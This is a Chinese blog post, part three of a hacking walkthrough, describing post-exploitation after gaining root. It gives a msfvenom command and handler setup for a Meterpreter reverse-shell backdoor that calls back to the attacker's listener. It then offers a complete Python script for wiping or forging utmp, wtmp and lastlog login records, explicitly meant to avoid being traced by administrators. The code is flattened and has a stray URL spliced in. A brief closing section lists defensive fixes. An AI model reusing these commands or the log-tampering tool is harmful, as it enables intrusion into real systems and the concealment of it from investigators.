黑客渗透提权过程解析( 三 ) _黑客渗透

反正我们现在拿到 root 的 shell 了，先反弹一个 Meterpreter 的会话，还是常规的生成 payload，然后监听等待上线
1、先生成一个后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.79.132 LPORT=4455 -f elf > shell.elf

文章插图

2、把 shell.elf 上传到目标机子上面运行

文章插图

3、在本地执行监听
use exploit/multi/handlerset PAYLOAD linux/x86/meterpreter/reverse_tcpset LHOST 0.0.0.0set LPORT 4455exploit

文章插图

4、执行后门反弹 Meterpreter 的会话
chmod +x ./shell.elf./shell.elf

文章插图

5、查看跳板机处于哪几个网段

run get_local_subnets

文章插图

但是我这个是属于外网的机子，后来想了一下感觉都不是内网一点意思都没有。。。
0x09
走之后记得清理痕迹，以防被溯源或者被管理员发现了。下面附上一个脚本供大家使用：
import os, struct, sysfrom pwd import getpwnamfrom time import strptime, mktimefrom optparse import OptionParserUTMPFILE = "/var/run/utmp"WTMPFILE = "/var/log/wtmp"LASTLOGFILE = "/var/log/lastlog"LAST_STRUCT = 'I32s256s'LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)def getXtmp(filename, username, hostname): xtmp = '' try: fp = open(filename, 'rb') while True: bytes = fp.read(XTMP_STRUCT_SIZE) if not bytes: break data = https://www.isolves.com/it/aq/hk/2019-10-22/struct.unpack(XTMP_STRUCT, bytes) record = [(lambda s: str(s).split("", 1)[0])(i) for i in data] if (record[4] == username and record[5] == hostname): continue xtmp += bytes except: showMessage('Cannot open file: %s' % filename) finally: fp.close() return xtmpdef modifyLast(filename, username, hostname, ttyname, strtime): try: p = getpwnam(username) except: showMessage('No such user.') timestamp = 0 try: str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S') timestamp = int(mktime(str2time)) except: showMessage('Time format err.') data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname) try: fp = open(filename, 'wb') fp.seek(LAST_STRUCT_SIZE * p.pw_uid) fp.write(data) except: showMessage('Cannot open file: %s' % filename) finally: fp.close() return Truedef showMessage(msg): print msg exit(-1)def saveFile(filename, contents): try: fp = open(filename, 'w+b') fp.write(contents) except IOError as e: showMessage(e) finally: fp.close()if __name__ == '__main__': usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12' parser = OptionParser(usage=usage) parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]') parser.add_option('-t', '--ttyname', dest='TTYNAME') parser.add_option('-f', '--filename', dest='FILENAME') parser.add_option('-u', '--username', dest='USERNAME') parser.add_option('-i', '--hostname', dest='HOSTNAME') parser.add_option('-d', '--dateline', dest='DATELINE') (options, args) = parser.parse_args() if len(args) < 3: if options.MODE == '1': if options.USERNAME == None or options.HOSTNAME == None: showMessage('+[Warning]: Incorrect parameter.') if options.FILENAME == None: options.FILENAME = UTMPFILE # tamper newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME) saveFile(options.FILENAME, newData) elif options.MODE == '2': if options.USERNAME == None or options.HOSTNAME == None: showMessage('+[Warning]: Incorrect parameter.') if options.FILENAME == None: options.FILENAME = WTMPFILE # tamper newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME) saveFile(options.FILENAME, newData) elif options.MODE == '3': if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None: showMessage('+[Warning]: Incorrect parameter.') if options.FILENAME == None: options.FILENAME = LASTLOGFILE # tamper modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE) else: parser.print_help()0x10
1、此次渗透的入口点还是目标站点的程序出现的上传漏洞，应该对程序的上传点做过滤加白名单。
2、其实宝塔的功能已经对 php 的执行命令的函数做了严格的封锁，但是还是有漏网之鱼，在宝塔禁用的函数基础上的 disable_function 里面加上putenv函数的禁用。
3、被用脏牛提权，这个是内核的漏洞，应该及时升级内核版本,执行以下命令，需要重启。